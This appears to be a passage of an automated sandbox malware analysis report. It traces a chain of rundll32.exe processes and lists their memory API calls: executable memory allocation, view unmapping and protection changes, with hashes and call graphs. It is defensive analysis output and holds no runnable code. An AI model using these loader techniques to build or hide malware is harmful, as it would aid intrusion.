                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001D0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001D0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001D063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001D0770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2188145807.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 8c845bd7a9d44f48ecd72659dd369d635a91af7a0fff22964c4111745e888af5
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: FCB198B5E00109DFCB48CF84C591AAEB7B5BF88304F208159E919AB345D735EE82CFA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 001CFF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 1cff50-1cff9b call 1d0360 42 1cff9d-1cffa7 call 1d0360 39->42 43 1cffaa-1cffda call 1cfd30 VirtualAlloc 39->43 42->43
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CFFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.2188145807.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 900042fdf7f883baeb07b9f29496fca8e7a44ea98bbf02942e3e0086ac75ab76
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: A1113360D08289EEEB01D7E88409BEFBFB55B21704F044098D6456A282D3BA5759C7A6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2380 Parent PID: 2244 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1908d0 1073 1908ed 1072->1073 1078 18ff50 1073->1078 1075 19097c 1081 190530 VirtualAlloc 1075->1081 1077 1909b3 1079 18ff91 1078->1079 1080 18ffc4 VirtualAlloc 1079->1080 1080->1075 1082 19058e 1081->1082 1083 190615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 190650 1083->1084 1085 19077d 1084->1085 1086 190752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 190070 1088 18ff50 VirtualAlloc 1087->1088 1089 19007d 1088->1089

                                                                        Executed Functions

                                                                        Function 00190530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00190575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00190625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00190770
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2197891087.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: aea1f403cb3254309c980acc42e4dccf62f7f7b91da7773a6c9d4baf8a4c9e6a
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: DEB199B5E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0018FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 18ff50-18ff9b call 190360 42 18ffaa-18ffda call 18fd30 VirtualAlloc 39->42 43 18ff9d-18ffa7 call 190360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2197891087.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_170000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 8a0e2f16d3e2f68090e21e5e7611a51a1228c9cb88d0a34e35e9d00eb20a6ec8
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: 8D113060D08289EEEF01D7E8880A7EFBFB55B21704F044098D6446A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2372 Parent PID: 2380 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 1a08d0 1073 1a08ed 1072->1073 1078 19ff50 1073->1078 1075 1a097c 1081 1a0530 VirtualAlloc 1075->1081 1077 1a09b3 1079 19ff91 1078->1079 1080 19ffc4 VirtualAlloc 1079->1080 1080->1075 1082 1a058e 1081->1082 1083 1a0615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 1a0650 1083->1084 1085 1a077d 1084->1085 1086 1a0752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 1a0070 1088 19ff50 VirtualAlloc 1087->1088 1089 1a007d 1088->1089

                                                                        Executed Functions

                                                                        Function 001A0530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001A0575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 001A0625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 001A063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001A0770
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.2208013458.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_180000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 336a9459a41ae7e1f47b105f39a715a65b8de83f11da04df203158351b00b5fc
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: F7B19A78E00109DFCB48CF84C591AAEB7B5BF88314F248159E919AB355D735EE82CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0019FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 19ff50-19ff9b call 1a0360 42 19ffaa-19ffda call 19fd30 VirtualAlloc 39->42 43 19ff9d-19ffa7 call 1a0360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.2208013458.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_180000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: de335e17235b09190b637927304141649476f6793a9ad5fd71d5d0809f082e2f
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: A4113060D08289EEEF01D7E888097EFBFB55F21704F044098D6446A282D3BA57598BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 2564 Parent PID: 2372 rundll32.exeCOMMON

                                                                        Execution Graph

                                                                        Execution Coverage:10%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:16
                                                                        Total number of Limit Nodes:1

                                                                        Graph

                                                                        execution_graph 1072 2108d0 1073 2108ed 1072->1073 1078 20ff50 1073->1078 1075 21097c 1081 210530 VirtualAlloc 1075->1081 1077 2109b3 1079 20ff91 1078->1079 1080 20ffc4 VirtualAlloc 1079->1080 1080->1075 1082 21058e 1081->1082 1083 210615 UnmapViewOfFile VirtualAlloc 1082->1083 1084 210650 1083->1084 1085 21077d 1084->1085 1086 210752 VirtualProtect 1084->1086 1085->1077 1086->1084 1087 210070 1088 20ff50 VirtualAlloc 1087->1088 1089 21007d 1088->1089

                                                                        Executed Functions

                                                                        Function 00210530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00210575
                                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 00210625
                                                                        • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0021063F
                                                                        • VirtualProtect.KERNELBASE(?,?,00000000), ref: 00210770
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2217789579.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 12da7ea77053d9a4454a67c47f97abb959356eab343d44c8e8639802e2d4a6cd
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: A5B198B4E00109DFCB48CF94C591AAEB7B5BF98304F208159E919AB345D775EE92CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0020FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 20ff50-20ff9b call 210360 42 20ffaa-20ffda call 20fd30 VirtualAlloc 39->42 43 20ff9d-20ffa7 call 210360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2217789579.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_1f0000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 83315a3cf3cf2dacbed528e6ed80a8dc6b12b11bad318e9238a6ee6467b7b864
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: FA113060D08389DEEB01D7E884097EFBFB55B21704F044098E6446A282D2BA57588BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Analysis Process: rundll32.exe PID: 1336 Parent PID: 2564 rundll32.exeCOMMON

                                                                        Executed Functions

                                                                        Function 00220530, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00220575
                                                                        • UnmapViewOfFile.KERNEL32(?), ref: 00220625
                                                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 0022063F
                                                                        • VirtualProtect.KERNEL32(?,?,00000000), ref: 00220770
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2336979891.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_200000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                        • String ID:
                                                                        • API String ID: 238919573-0
                                                                        • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction ID: 00e88c1117e0c3b4ceee0d213066e79126017e98e7d40dcd939e9d18aeab0a39
                                                                        • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                        • Instruction Fuzzy Hash: 09B19A74E00109AFCB48CF84D591AAEB7B5BF88304F208159E919AB356D735EE92CF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0021FF50, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 39 21ff50-21ff9b call 220360 42 21ffaa-21ffda call 21fd30 VirtualAlloc 39->42 43 21ff9d-21ffa7 call 220360 39->43 43->42
                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0021FFD4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.2336979891.0000000000200000.00000040.00000001.sdmp, Offset: 00200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_200000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: VirtualAlloc
                                                                        • API String ID: 4275171209-164498762
                                                                        • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction ID: 30e7e9b02bc970f5c3576ad605b9d45b37784b2eb180760db78a940ab82c0233
                                                                        • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                        • Instruction Fuzzy Hash: C0113060D08289EEEB01D7E894097EFBFB55B21704F044098D6446A282D2BA57588BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions